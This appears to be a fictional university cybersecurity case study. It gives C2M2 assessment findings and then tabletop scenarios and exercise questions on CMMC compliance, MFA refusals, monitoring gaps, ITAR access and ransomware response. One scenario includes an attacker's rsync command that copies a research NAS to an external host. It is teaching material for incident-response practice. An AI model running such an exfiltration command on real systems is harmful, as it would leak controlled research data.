ARU conducted a C2M2 v2.1 self-evaluation in Q1 2026, facilitated by CISO James Whitfield with input from the OIT team and Granite Shield LLC (C3PAO). The assessment evaluated all ten C2M2 domains against documented practices, interviews with IT staff and select faculty, and review of available policy documentation. Results reflect an institution with foundational controls for administrative IT, nearly absent controls for research IT, and governance gaps that undercut the effectiveness of deployed tools. The overall profile: MIL 1 across most domains, MIL 2 only in Risk Management (where the CMMC gap assessment and POA&M represent structured management), and MIL 0 in Workforce Management.
OIT maintains a formal asset inventory for OIT-managed systems via ServiceNow ITSM. However, the 380+ research endpoints, 8 shadow servers, and departmental IT assets are not in the inventory. No baseline configuration standards exist for research or lab systems.
Tenable.io provides authenticated vulnerability scanning for OIT-managed systems. CISA advisories are received (REN-ISAC and CISA email). However, the HPC cluster and Research NAS are not scanned, and the November 2025 CISA advisory about HPC SSH targeting took 6 weeks to reach the CISO after initial receipt.
Risk Management is ARU's strongest C2M2 domain — driven by the CMMC gap assessment, active POA&M, and C3PAO engagement. A formal risk register is maintained by the GRC Specialist. Risk ownership is assigned. Executive visibility exists through the new ISGC. This is the only domain where management-level practices (MIL 2) are substantially demonstrated.
Duo MFA is deployed for staff and VPN. Active Directory manages OIT user accounts. However, there is no formal access review cycle, departmental accounts are managed outside OIT, and CyberArk PAM is only 60% deployed. The HPC cluster has no MFA.
Splunk SIEM is deployed and monitored by a dedicated SOC Analyst during business hours. However, coverage is limited to OIT-managed systems. The HPC cluster, Research NAS, departmental endpoints, and shadow servers generate no telemetry in Splunk. A CISA advisory about HPC targeting was received but not actioned for 6 weeks.
An Incident Response Plan exists but has not been updated since November 2023 and has never been exercised for the highest-risk scenarios: HPC compromise, ITAR breach, or ransomware on VLAN 20. The plan does not address DFARS 252.204-7012 72-hour reporting or ITAR notification to DDTC.
OIT reviews SOC 2 reports for major SaaS vendors (Workday, Ellucian, CrowdStrike, Kuali). However, no formal TPRM program exists, departmental vendor relationships are unknown, and research instrument vendors have unmonitored network access. CMMC sub-awardee security not assessed.
ARU's Workforce Management is the only domain assessed at MIL 0. No mandatory security awareness training exists. The Faculty Senate resolution actively creates a political barrier to enforcement. No role-based security training is provided for researchers handling CUI, ITAR data, or HIPAA-scope information. The CISO has no authority to mandate training for departmental IT staff.
Palo Alto NGFW, Cisco VLAN segmentation, and CrowdStrike EDR constitute the architectural foundation. However, the architecture has critical intentional gaps: SSH inspection disabled on VLAN 60, no zero-trust principles, CUI enclave boundary incomplete, and no DLP. The architecture protects administrative IT well and research IT poorly.
The CISO appointment 18 months ago marked ARU's first formal cybersecurity program. Budget exists, a GRC tool is in use, and CMMC remediation is structured. However, the CISO lacks formal authority over research IT, the ISGC is new and untested, and the Security Engineer vacancy leaves the program understaffed for its remediation workload.
During a network scan in November 2025, OIT discovered 8 unregistered servers in a lab closet at FAC-03 (Armstrong Research Complex). The servers are running unknown operating systems and are connected to VLAN 20. The departmental IT manager for the college says "those have been there for years — they run some bioinformatics pipelines." As the CISO, what are your immediate actions? What risks do these servers create for ARU's CMMC posture? Who has the authority to require their remediation, and what process would you follow?
Two faculty PIs — Dr. James Park (Physics) and Dr. Elena Vasquez (Engineering) — have refused to enroll in Duo Security for HPC access despite six months of escalation. Their accounts have active SSH access to SRV-05 (password only) which hosts DOE and DOD CUI. CISO Whitfield's request for a VP Research mandate has been pending 11 weeks. What governance levers does the CISO have to force compliance? What are the consequences of inaction if a breach occurs through one of these accounts? Draft a one-paragraph escalation memo to the President that frames this as an institutional risk, not an IT request.
ARU's Splunk SIEM covers OIT-managed systems only. The HPC (VLAN 60), Research NAS (SRV-06), departmental endpoints (VLAN 20), and shadow IT servers generate no telemetry. Assume ARU's security budget cannot increase for 12 months. Design a minimum viable monitoring approach that closes the most critical blind spots within existing resources. Specifically: what three telemetry sources would provide the highest-value coverage, and how would you deploy Splunk forwarders without VP Research approval for the HPC cluster?
At 11:47 PM on a Tuesday, a network flow anomaly alert (triggered by Internet2 traffic analysis, not Splunk) shows 340 GB of outbound data from the Research NAS (SRV-06) to an IP address in Eastern Europe over a 4-hour window. The CISO is paged. The NAS contains CUI from four active federal contracts. Walk through ARU's first 60 minutes of incident response. Who is notified? What containment actions are available? What are the DFARS 252.204-7012 reporting requirements, and what is the 72-hour deadline clock from the moment of discovery?
The Faculty Senate resolution (November 2025) expressing concern about cybersecurity controls impeding academic freedom has been cited by three department chairs as justification for not implementing OIT security baselines on departmental endpoints — specifically blocking CrowdStrike deployment on 536 dept-managed faculty laptops. ARU's DARPA Contracting Officer has written to the President stating that CMMC Level 2 certification is required by Q4 2026 or the contract ($18M) is at risk. How do you frame the CMMC requirement to the Faculty Senate? What is the minimum control set that satisfies CMMC without triggering academic freedom concerns? Who has final decision authority if the Faculty Senate and the President's office are in conflict?
ARU's 24 departmental IT staff independently acquire vendors for research software, lab instruments, and specialized computing tools. Several of these have persistent network connections to VLAN 20 (general faculty/research). OIT has no inventory of these relationships. For the CMMC enclave, how does this create a supply chain risk? What is the minimum TPRM control set that would satisfy CMMC Level 2 Practice SC.L2-3.13.1 (boundary protection) as it relates to third-party connections? Design a lightweight departmental vendor notification process that doesn't require full OIT procurement control.
The President has authorized a $200,000 emergency cybersecurity allocation following the ITAR incident (Dr. Liu). The CISO has 90 days to spend it and must present a prioritized plan to the Board of Trustees. The four highest-risk items are: (1) close HPC SSH internet exposure via a VPN jump host — estimated $35K in tools + 3 weeks staff time; (2) migrate remaining 73 CUI researchers to GCC High — $0 licensing (seats purchased), 2 months staff time; (3) deploy Splunk forwarders to HPC and NAS — $45K in Splunk licensing + 4 weeks; (4) fill Security Engineer vacancy — $135K salary + benefits, 60-day hiring timeline. Prioritize these four items and justify your sequencing based on C2M2 domain impact and risk reduction per dollar.
Scenario: It is 11:04 PM on a Tuesday. The ARU SOC Analyst receives an automated Splunk alert: 847 failed SSH authentication attempts against SRV-05 (HPC head node) from a Russian IP block (ASN associated with APT29 activity per CISA indicator feed) over the past 40 minutes. At 11:23 PM the alert type changes — successful SSH login from a new IP in the same block, using the credentials of Dr. James Park (Physics), one of the two PIs who never enrolled in Duo. The session is active. The attacker is running rsync -av /mnt/nas_research/ [external IP]:/drop/ — exfiltrating from the Research NAS. Estimated data transferred so far: 22 GB. The SOC Analyst wakes the CISO.
Scenario: During a quarterly audit of the CMMC CUI enclave access list, the GRC Specialist discovers that Dr. Wei Liu — a Chinese national with H-1B immigration status, employed as a Research Assistant Professor in the Institute for Autonomous Systems — has been accessing IAS lab systems containing ITAR-controlled technical data (UAV guidance algorithms and autonomous vehicle control source code) for the past 14 months. The systems are on VLAN 20 (general faculty network). Access logs show 42 authenticated sessions to the IAS NAS from Dr. Liu's account. The IAS Lab Director (Dr. Liu's direct supervisor) was aware of his access and did not flag it as a concern. ARU has no Technology Control Plan on file with the State Department.
Scenario: It is 7:34 AM on a Monday — eight days before ARU's spring semester financial aid disbursement date ($4.2 million to 6,800 students). The Help Desk receives 17 simultaneous calls from faculty reporting encrypted files and a ransom note on their screens. Investigation by the OIT Infrastructure Director confirms: a ransomware variant has spread across VLAN 20 (faculty/research) originating from a dept-managed faculty laptop (no CrowdStrike deployed). The malware has encrypted files on the IAS NAS and multiple research lab computers and is actively attempting lateral movement to VLAN 10 (admin). The VLAN 10/20 ACL appears to be holding. SRV-08 (Banner Integration Middleware — the financial aid dependency) is on VLAN 10 and is not yet affected. The 8 shadow IT servers are unresponsive. Three IAS researchers report their ITAR files appear to have been exfiltrated.
Constraints: $850,000 emergency authorization (one-time); 4-person security team (CISO + Security Analyst + GRC Specialist + SOC Analyst) plus 1 vacant Security Engineer position; institutional governance friction (Faculty Senate resolution, VP Research HPC authority); CMMC Level 2 assessment deadline Q4 2026.
Task: Using the ARU case study data, construct a prioritized remediation roadmap across three time horizons. For each item, identify the C2M2 domain it addresses, the estimated cost or effort, and the primary owner (CISO / CIO / VP Research / Legal). Justify your sequencing — what must happen first to enable later remediation steps?
Suggested Priority Framework: